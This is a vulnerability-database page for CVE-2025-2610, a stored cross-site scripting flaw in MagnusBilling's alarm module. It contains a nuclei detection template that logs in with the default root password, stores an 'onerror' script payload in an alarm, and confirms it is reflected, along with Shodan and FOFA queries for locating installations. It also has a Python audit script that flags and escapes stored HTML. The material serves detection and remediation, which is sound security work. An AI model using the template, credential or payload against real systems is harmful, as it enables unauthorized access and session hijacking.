MagnusBilling Alarm Module - Cross-Site Scripting

๐Ÿ—“๏ธย 02 Jul 2026ย 09:36:57Reported byย ProjectDiscoveryTypeย 
nuclei
ย nuclei
๐Ÿ”—ย github.com๐Ÿ‘ย 26ย Views

Critical cross-site scripting vulnerability in MagnusBilling allows stored attacks on authenticated users.

Related

| Reporter | Title | Published | Source |
|---|---|---|---|
| Circl | CVE-2025-2610 | 21 Mar 2025 23:20 | circl |
| CNNVD | MagnusBilling Security Vulnerability | 21 Mar 2025 00:00 | cnnvd |
| CVE | CVE-2025-2610 | 21 Mar 2025 22:35 | cve |
| Cvelist | CVE-2025-2610 MagnusBilling Stored Cross-Site Scripting in Alarm Module | 21 Mar 2025 22:35 | cvelist |
| EUVD | EUVD-2025-7201 | 3 Oct 2025 20:07 | euvd |
| NVD | CVE-2025-2610 | 21 Mar 2025 23:15 | nvd |
| Positive Technologies | PT-2025-12458 | 21 Mar 2025 00:00 | ptsecurity |
| RedhatCVE | CVE-2025-2610 | 23 Mar 2025 23:14 | redhatcve |
| VulnCheck KEV | VulnCheck KEV: CVE-2025-2610 | 21 Mar 2025 00:00 | vulncheck_kev |
| Vulnrichment | CVE-2025-2610 MagnusBilling Stored Cross-Site Scripting in Alarm Module | 21 Mar 2025 22:35 | vulnrichment |

Code
id: CVE-2025-2610

info:
  name: MagnusBilling Alarm Module - Cross-Site Scripting
  author: DhiyaneshDK
  severity: high
  description: |
    Improper neutralization of input during web page generation vulnerability in MagnusSolution MagnusBilling (Alarm Module modules) allows authenticated stored cross-site scripting. This vulnerability is associated with program files protected/components/MagnusLog.Php. This issue affects MagnusBilling through 7.3.0.
  impact: |
    Authenticated attackers can inject malicious HTML and JavaScript through the alarm module that persists and executes when other administrators view alarm configurations, potentially leading to session hijacking and privilege escalation.
  remediation: |
    Upgrade to MagnusBilling version 7.3.1 or later that properly sanitizes input in the alarm module.
  reference:
    - https://vulncheck.com/advisories/magnusbilling-logs-xss
    - https://chocapikk.com/posts/2025/magnusbilling/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2610
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
    cvss-score: 7.6
    cve-id: CVE-2025-2610
    cwe-id: CWE-79
    epss-score: 0.00896
    epss-percentile: 0.55104
    cpe: cpe:2.3:a:magnussolution:magnusbilling:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: magnussolution
    product: magnusbilling
    shodan-query: http.html:"magnusbilling"
    fofa-query: body="magnusbilling"
  tags: cve,cve2025,mbilling,xss,magnusbilling,authenticated,vkev,vuln

flow: http(1) && http(2) && http(3) && http(4)

variables:
  username: "root"
  password: "9F4CA770B638615AC5C3E0D2DA16B77C80C2F2C6" # magnus
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        POST /mbilling/index.php/authentication/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        user={{username}}&password={{password}}&key=

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "success")'
        condition: and
        internal: true

  - raw:
      - |
        GET /mbilling/index.php/authentication/check?_dc= HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "id_agent")'
        condition: and
        internal: true

  - raw:
      - |
        POST /mbilling/index.php/alarm/save?_dc= HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;

        rows={"id":0,"id_plan":0,"type":1,"amount":1,"condition":1,"status":1,"email":"{{email}}","period":3600,"creationdate":null,"subject":"test","message":"<img src=x onerror=alert(document.domain)>"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Operation was successful")'
        condition: and
        internal: true

  - raw:
      - |
        GET /mbilling/index.php/alarm/read?_dc=&page=1&start=0&limit=25 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "<img src=x onerror=alert(document.domain)>", "idPlanname")'
        condition: and
# digest: 4a0a0047304502204e8f7b172f77d2c162de4c8aee6597110d02626d78ec782c2b5d513ef71715a3022100fb801b5a3d84870658e4d44115aba8504aeffc64b9d3efea4a2f1342e69c6dc5:922c64590222798bb761d5b6d8e72950
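As an added defender-side example (not part of the nuclei template above or of MagnusBilling's own code), the following Python audits an alarm/read response for HTML already persisted in the user-controlled alarm fields the template populates, and shows the contextual output encoding the remediation calls for. The response layout and the idPlanname/subject/message/email field names are assumed from the template's requests; the sample JSON is constructed.

```python
import html
import json
import re

# Constructed sample of an alarm/read JSON response. The row structure is an
# assumption; the field names come from the template's save/read requests.
SAMPLE_ALARM_READ = json.dumps({
    "success": True,
    "rows": [
        {"id": 1, "idPlanname": "Default", "subject": "Balance low",
         "message": "Credit below threshold", "email": "ops@example.invalid"},
        {"id": 2, "idPlanname": "Default", "subject": "test",
         "message": "<img src=x onerror=alert(document.domain)>",
         "email": "x@example.invalid"},
    ],
})

# Markup that has no business in a plain-text alarm field.
HTML_TAG = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")
EVENT_HANDLER = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)
USER_FIELDS = ("subject", "message", "email")


def render_field(value: str) -> str:
    """Contextual output encoding: what the alarm grid must apply before
    placing user-controlled text into HTML (the fix the advisory describes)."""
    return html.escape(value, quote=True)


def find_stored_payloads(body: str) -> list:
    """Audit an alarm/read response body: return the rows whose user-controlled
    fields carry HTML tags or inline event handlers, i.e. payloads that are
    already stored and will fire for any administrator who opens the grid."""
    rows = json.loads(body).get("rows", [])
    hits = []
    for row in rows:
        for field in USER_FIELDS:
            value = str(row.get(field, ""))
            if HTML_TAG.search(value) or EVENT_HANDLER.search(value):
                hits.append({"id": row.get("id"), "field": field, "value": value})
    return hits


if __name__ == "__main__":
    for hit in find_stored_payloads(SAMPLE_ALARM_READ):
        print(f"alarm id {hit['id']}: HTML in '{hit['field']}' -> "
              f"rendered safely as {render_field(hit['value'])}")
```

Run it against a saved copy of the real alarm/read response during clean-up after upgrading to 7.3.1, since the fix stops new injection but does not rewrite rows already in the table.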


Vulners score (as of 04 Feb 2026 07:00): 5.3, Medium risk
Vulners AI Score: 5.3
CVSS 3.1: 5.4 - 7.6
EPSS: 0.00896